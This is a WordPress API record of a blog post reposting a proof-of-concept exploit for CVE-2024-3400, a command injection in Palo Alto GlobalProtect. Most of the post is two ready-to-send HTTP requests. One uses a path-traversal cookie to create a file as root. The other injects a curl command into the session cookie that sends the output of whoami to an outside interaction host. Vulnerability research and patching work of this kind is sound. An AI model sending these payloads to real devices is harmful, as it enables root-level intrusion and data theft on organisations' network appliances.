{"id":56300,"date":"2024-04-17T20:31:29","date_gmt":"2024-04-17T16:31:29","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178099\/paloalto-exec.txt"},"modified":"2024-04-17T20:31:29","modified_gmt":"2024-04-17T16:31:29","slug":"palo-alto-os-command-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/palo-alto-os-command-injection\/","title":{"rendered":"Palo Alto OS Command Injection"},"content":{"rendered":"<p># CVE-2024-3400<\/p>\n<p>CVE-2024-3400 Palo Alto OS Command Injection<\/p>\n<p>send this HTTP request: <\/p>\n<p>&#8220;`http<\/p>\n<p>POST \/ssl-vpn\/hipreport.esp HTTP\/1.1<br \/>Host: 127.0.0.1<br \/>Cookie: SESSID=\/..\/..\/..\/var\/appweb\/sslvpndocs\/global-protect\/portal\/images\/hellome1337.txt;<br \/>Connection: close<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 0<br \/>&#8220;`<\/p>\n<p>![image](https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400\/assets\/26070859\/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)<\/p>\n<p>you will create hellome1337.txt file on the server with root access <\/p>\n<p>now if you try to access the files you should receive 403 insted of 404<\/p>\n<p>![image](https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400\/assets\/26070859\/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)<\/p>\n<p>### Command Injection<\/p>\n<p>&#8220;`<br \/>POST \/ssl-vpn\/hipreport.esp HTTP\/1.1<br \/>Host: 127.0.01<br \/>Cookie: SESSID=.\/..\/..\/..\/opt\/panlogs\/tmp\/device_telemetry\/minute\/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;<br \/>Connection: close<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 0<\/p>\n<p>&#8220;`<\/p>\n<p>More Info : <br \/>https:\/\/attackerkb.com\/topics\/SSTk336Tmf\/cve-2024-3400\/rapid7-analysis<br \/>https:\/\/labs.watchtowr.com\/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400\/<\/p>\n","protected":false},"excerpt":{"rendered":"<p># CVE-2024-3400 CVE-2024-3400 Palo Alto OS Command Injection send this HTTP request: &#8220;`http POST \/ssl-vpn\/hipreport.esp HTTP\/1.1Host: 127.0.0.1Cookie: SESSID=\/..\/..\/..\/var\/appweb\/sslvpndocs\/global-protect\/portal\/images\/hellome1337.txt;Connection: closeContent-Type: application\/x-www-form-urlencodedContent-Length: 0&#8220;` ![image](https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400\/assets\/26070859\/96803de5-1d8c-42ec-b1fc-60e8e4a0a954) you will create hellome1337.txt file on the server with root access now if you try to access the files you should receive 403 insted of 404 ![image](https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400\/assets\/26070859\/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d) ### Command Injection &#8220;`POST \/ssl-vpn\/hipreport.esp HTTP\/1.1Host: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56300","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56300","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56300"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56300\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56300"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56300"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}